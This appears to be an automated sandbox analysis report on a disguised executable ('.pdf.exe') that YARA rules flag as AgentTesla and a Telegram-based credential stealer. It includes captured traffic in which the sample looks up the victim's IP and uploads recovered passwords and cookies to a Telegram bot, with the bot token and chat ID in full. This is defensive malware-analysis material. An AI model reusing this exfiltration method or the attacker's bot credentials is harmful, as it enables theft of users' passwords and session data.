2024-11-28 17:39:39 UTC	1369	IN	Data Raw: fa 90 23 fe 6f 74 c9 48 8c cb bc e7 f8 a9 8b 76 6b ed 7a 69 af c5 d1 70 00 fb 74 54 ac 8e ad 11 27 48 fc cd c9 3b 18 28 0f 28 9f 1e f4 2d 20 c0 e2 4f 2c 0c e1 76 36 00 1a c6 3e e9 26 3c 2f 08 e5 14 7f d6 2a d8 4a 10 3b 31 6d 0c 87 19 10 57 9c 0f d2 86 b0 5b c5 b9 bb a6 d2 97 6c fd 91 9d 52 db 96 ee c8 55 a8 28 db dd 91 fa d6 8b d5 80 36 83 31 b4 20 03 92 30 8b 8f a7 42 f3 6d ba 76 c2 0c 94 ea c0 00 66 56 dd fc 0d ac f9 6a 43 af 2f 75 18 23 1a 9c 08 58 d4 3d a6 04 7b fe 73 86 3a 85 b6 76 00 8c 52 34 47 d3 72 27 13 85 67 2f 30 7c 0b 53 2d 60 09 ac 56 a5 aa 3f 4a 44 02 a6 d0 36 e2 ff 38 a8 4e 80 40 0a 70 9b bc 54 c7 50 9b f4 7c 9b c9 8c f8 2e 28 99 e8 2f 58 f6 8d b0 2b 1c 00 23 69 f9 0b 53 87 70 32 e6 f4 88 86 cc b7 a2 c8 9a c7 f8 86 8a a0 14 46 ea 56 41 10 Data Ascii: #otHvkziptT'H;((- O,v6>&</*J;1mW[lRU(61 0BmvfVjC/u#X={s:vR4Gr'g/0\|S-`V?JD68N@pTP\|.(/X+#iSp2FVA
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: db c6 36 af 56 6e fb bb 45 25 f7 5e 49 f4 07 24 6a e6 a9 0e c4 29 3e fa 42 c5 96 4a ef cc 8d 60 79 3b 4a ce 4a 6e 66 42 36 4b eb d1 e1 68 9c 4c 5c fd d4 8b 6a 17 e8 96 a8 36 0f 04 a8 61 69 5e 4b cf 77 6d 83 fb 45 46 f1 4a 1c 57 47 c8 6d e2 bb 40 8b 97 d7 47 3e 1a 70 d5 f4 fb 25 e0 be 54 aa 2a 32 dc ed 04 74 94 a0 97 a4 91 b5 50 3d ef 1c 99 77 48 b4 7b ba 4b 9a 0c 25 b0 e5 2c 86 d5 ae f8 af f1 ef 4e 83 2a 06 a1 36 f1 af 72 7e 39 7e d6 2e 5a 2e 4c 1e f5 be 05 eb 11 65 52 27 a4 75 fc 15 bd a4 02 21 71 10 73 1b f1 f4 3f 55 8b ba e9 42 24 6c 84 db 25 75 b4 d4 65 23 cf fd 53 cd 2e 56 6c c5 45 03 13 83 31 5c 2b a6 33 32 71 5a c7 9c 5c 47 82 b2 12 60 0d b2 08 64 74 e5 eb 69 e8 22 c7 f4 36 11 83 27 48 34 b8 0c 44 bf 7a 1b e6 30 46 75 6e b0 c2 6c d7 f5 ca 2f 21 f4 Data Ascii: 6VnE%^I$j)>BJ`y;JJnfB6KhL\j6ai^KwmEFJWGm@G>p%T2tP=wH{K%,N6r~9~.Z.LeR'u!qs?UB$l%ue#S.VlE1\+32qZ\G`dti"6'H4Dz0Funl/!
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: 1e 9d 5e 98 5c 32 b8 b6 cf 5e 70 64 b2 f6 08 b6 a6 c2 2c b9 37 95 ae 79 9e 7c 87 05 17 83 77 ef eb de 0c 7d c4 74 6a 34 50 03 81 16 0a 82 a6 69 8c 46 3c 20 02 e7 4e 0c 3b fc 01 7d 41 b3 95 ee 31 55 77 71 0e 03 c3 ad 63 09 52 c4 6b 10 80 e9 86 c0 57 3b 3c 57 29 45 95 dd 15 32 91 1f 81 70 71 7f dd 25 94 a2 cf 78 24 c5 3e 63 2d 47 24 06 1a f0 1c e9 a4 3c b3 7d cb 7f 88 80 39 e2 a6 e2 a7 d3 55 52 6f 49 78 9c 3f a6 d1 1c e1 4b 93 b3 75 84 f3 eb 4a 3c 48 c4 be 7f 42 7a db 34 ea 9f 5d e9 38 59 a9 7a 61 8a 8b 6e 4a 09 f2 22 ac 20 99 5a c2 4a 5d a4 03 7c 86 3a fd c2 54 01 83 68 8e 6a 41 c1 24 eb 93 1e 54 ec bb 9b eb 0c 50 1a 3c af 35 6f 64 89 49 46 46 a3 0c 87 7b d7 e6 2b 6f d7 9a bb dd 46 dc 49 db fd 99 27 ee 1d 19 49 f6 85 0c 54 b3 4a f9 84 da 02 6e a7 3a 62 e6 Data Ascii: ^\2^pd,7y\|w}tj4PiF< N;}A1UwqcRkW;<W)E2pq%x$>c-G$<}9URoIx?KuJ<HBz4]8YzanJ" ZJ]\|:ThjA$TP<5odIFF{+oFI'ITJn:b
2024-11-28 17:39:39 UTC	1369	IN	Data Raw: 63 44 43 7e c7 4f 1a d6 24 54 de dc 31 95 f8 6d 82 22 89 cb 80 73 1a 2e 27 ef 84 0a 3e 29 6e de f4 ac 95 fb d2 dd ec 2f d4 ba 47 61 64 f4 b1 ee 0c 5f 3b d0 91 5a f0 a0 93 6e 12 d2 a3 02 3f 00 d2 03 73 82 f2 98 fe 6b 80 78 8d 39 4a b6 0e 47 e0 98 2f b4 6d 57 f5 58 3b 67 97 fc b3 a0 b3 f2 b4 a9 1f d9 5e 9b f4 ff ed 86 d7 cb 48 90 1f 1c f0 78 f6 33 f4 51 aa 4e 57 1f aa e5 17 ae 62 bf c7 a3 d4 7f 9a 8e 65 ce 40 f6 20 59 d0 90 df a6 9d b0 79 41 b1 4d 35 e2 57 41 94 e4 c2 77 0f ee a5 25 c9 e3 95 2f 69 13 a6 ef e3 ea 8a 49 2c d7 1e fb 87 f1 f3 9d 50 75 c4 df 1c 73 c8 53 78 45 27 f5 9a 0e da 65 7b 71 b8 15 50 b3 68 89 f7 5b 9f 4e ac 10 39 f9 56 52 8d 9b 29 96 cc e5 09 38 3d 9b 1c 8d 57 81 75 8b 76 65 d1 1e 33 2d 59 5e 97 b5 35 e4 b2 45 a1 28 29 58 78 5a c3 0f 32 Data Ascii: cDC~O$T1m"s.'>)n/Gad_;Zn?skx9JG/mWX;g^Hx3QNWbe@ YyAM5WAw%/iI,PusSxE'e{qPh[N9VR)8=Wuve3-Y^5E()XxZ2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49749	104.26.13.205	443	1816	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:40:29 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-28 17:40:29 UTC	424	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:40:29 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e9c24b64dad7c90-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1794&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1580942&cwnd=252&unsent_bytes=0&cid=b523893648dcce32&ts=466&x=0"
2024-11-28 17:40:29 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49750	149.154.167.220	443	1816	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:40:32 UTC	260	OUT	POST /bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0fa9d74c97c9 Host: api.telegram.org Content-Length: 978 Expect: 100-continue Connection: Keep-Alive
2024-11-28 17:40:32 UTC	978	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 61 39 64 37 34 63 39 37 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 37 36 35 33 33 35 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 61 39 64 37 34 63 39 37 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 38 2f 32 30 32 34 20 31 32 3a 34 30 3a 32 39 0a 55 73 65 Data Ascii: -----------------------------8dd0fa9d74c97c9Content-Disposition: form-data; name="chat_id"-4176533554-----------------------------8dd0fa9d74c97c9Content-Disposition: form-data; name="caption"New PW Recovered!Time: 11/28/2024 12:40:29Use
2024-11-28 17:40:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-28 17:40:32 UTC	1149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 28 Nov 2024 17:40:32 GMT Content-Type: application/json Content-Length: 761 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":9173,"from":{"id":7121198832,"is_bot":true,"first_name":"Marchmath008","username":"Mymarchmath24_bot"},"chat":{"id":-4176533554,"title":"Mymarchmathapp","type":"group","all_members_are_administrators":true},"date":1732815632,"document":{"file_name":"user-065367 2024-11-28 12-40-29.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIj1WdIqxClYFKB71PpRkPvwHcQS81MAAJvFQAC_p1IUurb_CMLqh_ONgQ","file_unique_id":"AgADbxUAAv6dSFI","file_size":350},"caption":"New PW Recovered!\n\nTime: 11/28/2024 12:40:29\nUser Name: user/065367\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":181,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49752	149.154.167.220	443	1816	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:40:34 UTC	236	OUT	POST /bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0fc884398fec Host: api.telegram.org Content-Length: 917 Expect: 100-continue
2024-11-28 17:40:34 UTC	917	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 63 38 38 34 33 39 38 66 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 37 36 35 33 33 35 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 63 38 38 34 33 39 38 66 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 38 2f 32 30 32 34 20 31 36 3a 32 30 3a 30 34 0a 55 73 65 Data Ascii: -----------------------------8dd0fc884398fecContent-Disposition: form-data; name="chat_id"-4176533554-----------------------------8dd0fc884398fecContent-Disposition: form-data; name="caption"New CO Recovered!Time: 11/28/2024 16:20:04Use
2024-11-28 17:40:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-28 17:40:35 UTC	1149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 28 Nov 2024 17:40:35 GMT Content-Type: application/json Content-Length: 761 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":9174,"from":{"id":7121198832,"is_bot":true,"first_name":"Marchmath008","username":"Mymarchmath24_bot"},"chat":{"id":-4176533554,"title":"Mymarchmathapp","type":"group","all_members_are_administrators":true},"date":1732815635,"document":{"file_name":"user-065367 2024-11-28 16-20-04.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIj1mdIqxNmSQ6KVM7qIaE7yjrJaYkXAAJwFQAC_p1IUjzSRo4muJUrNgQ","file_unique_id":"AgADcBUAAv6dSFI","file_size":289},"caption":"New CO Recovered!\n\nTime: 11/28/2024 16:20:04\nUser Name: user/065367\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.228","caption_entities":[{"offset":181,"length":12,"type":"url"}]}}

Target ID:	0
Start time:	12:39:35
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe"
Imagebase:	0x1f478c50000
File size:	376'832 bytes
MD5 hash:	CFBFABD8E0B67D01A19458BE6B945517
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2652297569.000001F47B590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2630438443.000001F4005F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2638682795.000001F410C2E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2638682795.000001F410011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:40:26
Start date:	28/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x16985a70000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:40:26
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FFD34A7082D Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFD34A70D77

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: fa71f910a445cc2c2bf80d0fef5aa4a892df1bd08fde4e14b33930287ebe5f5c
Instruction ID: ae45c08b54544a29843aeb096d1e429abfb700a8fe21c8a6cd79303184eb12bc
Opcode Fuzzy Hash: fa71f910a445cc2c2bf80d0fef5aa4a892df1bd08fde4e14b33930287ebe5f5c
Instruction Fuzzy Hash: CCB11B71B0D7464FE3749A6898A52BA7BD0EF46318F24427ED58DC71D3DE1CE842A382

Function 00007FFD34A77C15 Relevance: .8, Instructions: 776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa02805830db7033628213ba084ed88434dbd48a96aec0aed01c5405ef754fa
Instruction ID: 510352cefc040bf05ec6fdcb2c9d53f8716f8586b99d7d0302013c822e4bb998
Opcode Fuzzy Hash: 1fa02805830db7033628213ba084ed88434dbd48a96aec0aed01c5405ef754fa
Instruction Fuzzy Hash: 2732B735B18A194FDBA8EB58C8A56A977E1FF59304F1041BDD14EC7296DE38BC428B80

Function 00007FFD34A70FF9 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f39a8f4eeaa448dc2aeaaba8dc42b8c2518303d0c465f82ab1f3239fb1ccd0a
Instruction ID: 14940edf8eaf09bfbd3df15498dbece7567c85447c2fd1cc4f699a2f1ab8706b
Opcode Fuzzy Hash: 2f39a8f4eeaa448dc2aeaaba8dc42b8c2518303d0c465f82ab1f3239fb1ccd0a
Instruction Fuzzy Hash: A4C11731B0D9494FEBB4DA6C88A96753BD1EF5A318B1440BED58DCB3A3DD1CAC428381

Function 00007FFD34A71521 Relevance: 4.6, Strings: 3, Instructions: 874COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34A71902
, xrefs: 00007FFD34A71C0D
1_H, xrefs: 00007FFD34A71C51

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: $ $ 1_H
API String ID: 0-1425310946
Opcode ID: 37d8b85143c764dee9e0b26dbd79cb2f3bab6998acd57ff4583f2ac11c858c0c
Instruction ID: 5da0b7dd06aae4cb09828ae9e0cdcce684876c41f0ba00459f6a06d0cfe14461
Opcode Fuzzy Hash: 37d8b85143c764dee9e0b26dbd79cb2f3bab6998acd57ff4583f2ac11c858c0c
Instruction Fuzzy Hash: 9942B4317089098FEBB4EB6CC8A5A653BD1FF59318B1541BAE14EC72A2DE2CEC419741

Function 00007FFD34A71540 Relevance: 3.3, Strings: 2, Instructions: 774COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34A71C0D
1_H, xrefs: 00007FFD34A71C51

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: $ 1_H
API String ID: 0-1116767729
Opcode ID: 7b1cdd5c2afce20b519596a5a4564cb960645c6a8e45902608d18d05d1f40aab
Instruction ID: 6358d6d9138f249ef767cbe60ae1f91ce0cc46f3d77024a7189eb24553068b8d
Opcode Fuzzy Hash: 7b1cdd5c2afce20b519596a5a4564cb960645c6a8e45902608d18d05d1f40aab
Instruction Fuzzy Hash: 1C32B4317189494FEBA4EB6CC8E9A783BD1FF59309B1540BAD14EC73A2DE28EC419741

Function 00007FFD349C1520 Relevance: 2.1, Strings: 1, Instructions: 836COMMON

Download Yara Rule

Strings

&<_H, xrefs: 00007FFD349C1653

Memory Dump Source

Source File: 00000000.00000002.2654279024.00007FFD349C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD349C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd349c0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: &<_H
API String ID: 0-3427318579
Opcode ID: aa0da72fcdbfdd8b0e1a22a46beaf782d7ab42f508fa5a1ba15cc042485e4d50
Instruction ID: 4602c4ad411879e877f2952afd7411fe7f872055ceca327a229bd91985c86a26
Opcode Fuzzy Hash: aa0da72fcdbfdd8b0e1a22a46beaf782d7ab42f508fa5a1ba15cc042485e4d50
Instruction Fuzzy Hash: 1F527F71E0894A8FEF90DB5888A67E977E1FF5A300F540179D10DE3296DB2CAC82DB54

Function 00007FFD34A73766 Relevance: 2.0, Strings: 1, Instructions: 723COMMON

Download Yara Rule

Strings

z\H, xrefs: 00007FFD34A73BF2

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: z\H
API String ID: 0-1465988991
Opcode ID: 2138e892c0a0aacd2ffdae179ae6e6d3eb3837a8ea1cd3016407071c249043b7
Instruction ID: fa605c4a9c166dbf3f97fce1f7c56ec01d57d82c8011c075c0b3ad889dd87f05
Opcode Fuzzy Hash: 2138e892c0a0aacd2ffdae179ae6e6d3eb3837a8ea1cd3016407071c249043b7
Instruction Fuzzy Hash: 2532D830B1CA594FDBA4EB6888A57A977E1FF59314F1441BED04DC7296CE38AC41CB81

Function 00007FFD34A734D5 Relevance: 1.9, Strings: 1, Instructions: 698COMMON

Download Yara Rule

Strings

z\H, xrefs: 00007FFD34A73BF2

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: z\H
API String ID: 0-1465988991
Opcode ID: f99b04cd9c4f74c9f39af09924f02015bb052e4efa642e2989301104b56e94c2
Instruction ID: 71bb494095ef690f31e69060f53404ce5f20b979342fcbf836b9173cb194383a
Opcode Fuzzy Hash: f99b04cd9c4f74c9f39af09924f02015bb052e4efa642e2989301104b56e94c2
Instruction Fuzzy Hash: 8D22D830B0CA594FDBA4EB6888A57A977E1FF5A318F1041BDD10DC7296CE38AC45CB81

Function 00007FFD34A737A9 Relevance: 1.8, Strings: 1, Instructions: 529COMMON

Download Yara Rule

Strings

z\H, xrefs: 00007FFD34A73BF2

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: z\H
API String ID: 0-1465988991
Opcode ID: 85c5569e1e0694cbd79366a669fd01d005755550b430711a2c455c1add933007
Instruction ID: dd887c0bbe541592083620c171863f7d0a27f59509dd289ee73776cb428321c6
Opcode Fuzzy Hash: 85c5569e1e0694cbd79366a669fd01d005755550b430711a2c455c1add933007
Instruction Fuzzy Hash: B302B930B1CA594FDBA4EB6888A57697BE1FF5A304F1441BED14DC7296CE38AC41CB81

Function 00007FFD348BDD50 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

?L_H, xrefs: 00007FFD348BE6BD

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: ?L_H
API String ID: 0-3047738230
Opcode ID: 052301de9202fb5723847480bdf955927553d84ff4b75ee2dfb94915b8ee9172
Instruction ID: 205318d7c238b698a9ee676170def28d0d585e56b9ab8674547c8a76d6c6a7ad
Opcode Fuzzy Hash: 052301de9202fb5723847480bdf955927553d84ff4b75ee2dfb94915b8ee9172
Instruction Fuzzy Hash: 9F129970A0961D8FDBA9EB58C895BA9B7B5FF59300F1041E9D00DE7261DB74AE81CF40

Function 00007FFD34A73DE6 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

z\H, xrefs: 00007FFD34A73BF2

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: z\H
API String ID: 0-1465988991
Opcode ID: 68205fc342e16cd63e2776260262fc8d6745b1b3eabe10d7cadbc2d2e8d346f5
Instruction ID: 1e9771b0e8277200e800fd86929a29c13034d8d1997ed485441f2ba71beffde1
Opcode Fuzzy Hash: 68205fc342e16cd63e2776260262fc8d6745b1b3eabe10d7cadbc2d2e8d346f5
Instruction Fuzzy Hash: 0EC17830B18A594FDBA4EB6888A57A977E1FF99304F1085BDD14EC3296CE3CAC41DB41

Function 00007FFD348A21D7 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

"N_^, xrefs: 00007FFD348A2201

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: "N_^
API String ID: 0-3767215371
Opcode ID: c52f6e9947ccea2481afd68019a08df01af780ece4fcde8f55b0685e5b69c8bb
Instruction ID: e627a2d196c0fdd7c9b97bba9cf7ef23e313c6c25a7e7aa996b0325c94835225
Opcode Fuzzy Hash: c52f6e9947ccea2481afd68019a08df01af780ece4fcde8f55b0685e5b69c8bb
Instruction Fuzzy Hash: E2912432A096955FD721F7FCA4B11EA7BB0EF02329B0C41B7D18CCB163E938A8458791

Function 00007FFD348A21F7 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

"N_^, xrefs: 00007FFD348A2201

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

